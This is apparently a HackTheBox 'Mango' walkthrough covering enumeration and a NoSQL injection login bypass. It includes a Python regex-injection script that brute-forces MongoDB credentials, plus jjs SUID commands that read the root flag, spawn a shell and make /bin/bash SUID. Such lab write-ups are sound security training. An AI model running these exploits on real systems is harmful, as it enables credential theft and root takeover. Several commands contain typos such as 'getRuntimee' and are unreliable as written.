HackTheBox | Mango Walkthrough
Hi Folks!
Hope you are doing well.
let’s get started with enumeration.
Enumeration
Nmap Scan
nmap -T4 -v -p- -sCV <target_ip>
We got three open ports: port 22 running a SSH, port 80 running HTTP and port 443 running HTTPS.
The nmap disclose domain name of the box is mango.htb and stagin-order.mango.htb.
So let’s add them to our hosts file.
echo "<target_ip> mango.htb staging-order.mango.htb" >> /etc/hostsWeb Enumeration
HTTP
When we access the HTTP, we got Forbidden.
Here, I used dirsearch to fuzz directories, but I didn’t get much.
HTTPs
So let’s access HTTPs service.
From navigating through the app, most of the links are dead and I just got a /analytics.php page, which presents a spreadsheet with a pie chart.
The menus are interesting, but they are dead links.
So we got the last chance, HTTPs service subdomain.
I tried to login, bypass login with some SQLi and doing some bruteforce, but I got nothing.
Here, I got stuck for some time. But the box name is called Mango, this is interesting as it may refer to MonogoDB and I didn’t try NoSQLi payloads.
Eaploitation
So I decided to try some NoSQLi payloads to bypass the login, and it worked!!
I got redirected to a /home.php page.
I didn’t find any thing interesting with the home page, so I returned back to the login page to try to dump any credentials.
Here, I used a python script from Hacktricks to bruteforce the login usernames and passwords to use it to login with SSH.
import requests
import string
url = "http://example.com"
headers = {"Host": "exmaple.com"}
cookies = {"PHPSESSID": "s3gcsgtqre05bah2vt6tibq8lsdfk"}
possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ]
def get_password(username):
print("Extracting password of "+username)
params = {"username":username, "password[$regex]":"", "login": "login"}
password = "^"
while True:
for c in possible_chars:
params["password[$regex]"] = password + c + ".*"
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
if int(pr.status_code) == 302:
password += c
break
if c == possible_chars[-1]:
print("Found password "+password[1:].replace("\\", "")+" for username "+username)
return password[1:].replace("\\", "")
def get_usernames(prefix):
usernames = []
params = {"username[$regex]":"", "password[$regex]":".*"}
for c in possible_chars:
username = "^" + prefix + c
params["username[$regex]"] = username + ".*"
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
if int(pr.status_code) == 302:
print(username)
for user in get_usernames(prefix + c):
usernames.append(user)
return usernames
for u in get_usernames(""):
get_password(u)I got two credentials.
I tried to login with admin, but it didn’t work. so I used mango to login and it worked.
I found an admin user and we can use the found credentials to switch to.
Privilege Escalation
Enumeration
I found an interesting SUID binary.
I used GTFOBins to search for the binary and I found an exploitation.
We can just read the root file.
echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/root.txt"));
while ((line = br.readLine()) != null) { print(line); }' | jjs
Or we can get a shell.
echo "Java.type('java.lang.Runtime').getRuntimee().exec('/bin/sh -pc \$@|sh\${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)').waitFor()" | jjsBut it didn’t work with me, so I decided to just add the SUID to /bin/bash.
echo "Java.type('java.lang.Runtime').getRuntimee().exec('chmod +s /bin/bash').waitFor()" | jjs
Conclusion
This was great fun!
I hope you enjoyed the walkthrough. I waiting for your feedbacks.
Don’t forget to check other walkthroughs.
